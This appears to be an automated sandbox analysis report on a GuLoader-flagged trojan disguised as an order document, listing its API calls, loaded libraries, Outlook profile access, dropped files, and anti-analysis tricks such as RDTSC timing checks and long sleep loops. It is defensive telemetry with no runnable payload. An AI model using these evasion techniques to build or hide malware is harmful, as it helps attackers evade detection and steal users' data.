Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E9D8 4_2_3AE8E9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C9D8 4_2_3AE8C9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE81190 4_2_3AE81190
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE80D48 4_2_3AE80D48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E548 4_2_3AE8E548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C548 4_2_3AE8C548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C558 4_2_3AE8C558
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8A928 4_2_3AE8A928
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8A938 4_2_3AE8A938
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E538 4_2_3AE8E538
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE80D39 4_2_3AE80D39
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: String function: 00402C41 appears 51 times
Sample file is different than original file name gathered from version info
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORDER 20240986 OA.exe
Uses 32bit PE files
Source: ORDER 20240986 OA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@4/4
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_00402104
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Mutant created: NULL
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Temp\nsr11BF.tmp Jump to behavior
Source: ORDER 20240986 OA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ORDER 20240986 OA.exe ReversingLabs: Detection: 44%
Source: ORDER 20240986 OA.exe Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File read: C:\Users\user\Desktop\ORDER 20240986 OA.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: ORDER 20240986 OA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2287809032.0000000003873000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2287296673.000000000083C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7316, type: MEMORYSTR
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBB1B63
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB2FD0 push eax; ret 0_2_6FBB2FFE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00159C30 push esp; retf 0017h 4_2_00159D55
Drops PE files
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API/Special instruction interceptor: Address: 3C78CCE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API/Special instruction interceptor: Address: 2A18CCE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe RDTSC instruction interceptor: First address: 3C164A6 second address: 3C164A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB1459D15h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe RDTSC instruction interceptor: First address: 29B64A6 second address: 29B64A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB133B325h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 37BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 37B00000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599639 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597688 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596247 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594437 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594328 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Window / User API: threadDelayed 8654 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Window / User API: threadDelayed 1183 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API coverage: 0.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080 Thread sleep count: 8654 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080 Thread sleep count: 1183 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599639s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597688s >= -30000s Jump to behavior
